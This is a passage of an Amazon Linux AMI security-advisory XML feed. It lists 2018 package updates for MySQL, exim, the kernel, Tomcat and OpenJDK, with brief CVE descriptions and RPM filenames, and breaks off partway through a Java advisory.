href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2703" title="" id="CVE-2018-2703" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-server" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.39-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-970</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-970: critical priority package update for exim</title><issued date="2018-03-07 21:43:00" /><updated date="2018-03-08 22:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6789:
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
1543268:
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6789" title="" id="CVE-2018-6789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.90.1-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-971</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-971: important priority package update for kernel</title><issued date="2018-03-16 16:17:00" /><updated date="2018-03-16 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1068:
A flaw was found in the Linux kernel&#039;s implementation of 32-bit syscall interface for bridging. This allowed a privileged user to arbitrarily write to a limited range of kernel memory.
1552048:
CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1068" title="" id="CVE-2018-1068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.85" release="38.58.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.85-38.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-972</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-972: medium priority package update for tomcat7 tomcat8</title><issued date="2018-03-21 22:06:00" /><updated date="2018-03-23 17:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1305:
Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.
1548282:
CVE-2018-1305 tomcat: Late application of security constraints can lead to resource exposure for unauthorised users
CVE-2018-1304:
The URL pattern of &quot;&quot; (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.
1548289:
CVE-2018-1304 tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1304" title="" id="CVE-2018-1304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1305" title="" id="CVE-2018-1305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-log4j" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-973</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-973: medium priority package update for tomcat80</title><issued date="2018-03-21 22:08:00" /><updated date="2018-03-23 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1305:
Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.
1548282:
CVE-2018-1305 tomcat: Late application of security constraints can lead to resource exposure for unauthorised users
CVE-2018-1304:
The URL pattern of &quot;&quot; (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.
1548289:
CVE-2018-1304 tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1304" title="" id="CVE-2018-1304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1305" title="" id="CVE-2018-1305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat80-servlet-3.1-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-lib" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.50-1.79.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-974</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-974: important priority package update for java-1.7.0-openjdk</title><issued date="2018-03-21 22:12:00" /><updated date="2018-03-23 17:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2678:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534263:
CVE-2018-2678 OpenJDK: unbounded memory allocation in BasicAttributes deserialization (JNDI, 8191142)
CVE-2018-2677:
